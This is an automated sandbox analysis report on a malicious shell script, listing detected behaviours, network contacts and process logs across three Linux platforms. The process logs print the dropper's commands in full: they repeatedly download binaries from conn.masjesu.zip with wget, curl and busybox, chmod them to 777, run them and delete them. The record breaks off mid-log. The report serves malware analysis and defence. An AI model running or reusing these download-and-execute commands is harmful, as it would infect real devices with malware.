Analysis Overview
SHA256
f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846
Threat Level: Shows suspicious behavior
The file f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 08:51
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 08:51
Reported
2024-11-21 08:55
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
129s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh
[/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 151.101.193.91:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 89.187.167.7:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.39:443 | 1527653184.rsc.cdn77.org | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 08:51
Reported
2024-11-21 08:55
Platform
debian9-armhf-20240418-en
Max time kernel
148s
Max time network
3s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh
[/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 08:51
Reported
2024-11-21 08:56
Platform
debian9-mipsbe-20240611-en
Max time kernel
85s
Max time network
87s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | N/A |
| N/A | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | N/A |
| N/A | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | N/A |
| N/A | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | N/A |
| N/A | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | N/A |
| N/A | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | N/A |
| N/A | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | N/A |
| N/A | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | N/A |
| N/A | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | N/A |
| N/A | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | N/A |
| N/A | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | N/A |
| N/A | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | N/A |
| N/A | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | N/A |
| N/A | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | N/A |
| N/A | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | N/A |
| N/A | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | N/A |
| N/A | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | N/A |
| N/A | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | N/A |
| N/A | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | N/A |
| N/A | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | N/A |
| N/A | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | N/A |
| N/A | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | N/A |
| N/A | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | N/A |
| N/A | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | N/A |
| N/A | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | N/A |
| N/A | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | N/A |
| N/A | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | N/A |
| N/A | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR | /usr/bin/curl | N/A |
Processes
/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh
[/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/chmod
[chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
[./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/bin/rm
[rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/chmod
[chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
[./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/bin/rm
[rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/chmod
[chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
[./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/bin/rm
[rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/chmod
[chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
[./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/bin/rm
[rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/chmod
[chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
[./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/bin/rm
[rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/chmod
[chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
[./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/bin/rm
[rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/chmod
[chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
[./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/rm
[rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/chmod
[chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
[./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/bin/rm
[rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/chmod
[chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
[./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/bin/rm
[rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/chmod
[chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
[./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/bin/rm
[rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/chmod
[chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
[./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/bin/rm
[rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/chmod
[chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
[./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/bin/rm
[rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/chmod
[chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
[./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/bin/rm
[rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/chmod
[chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
[./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/bin/rm
[rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/chmod
[chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
[./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/bin/rm
[rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa]
/usr/bin/curl
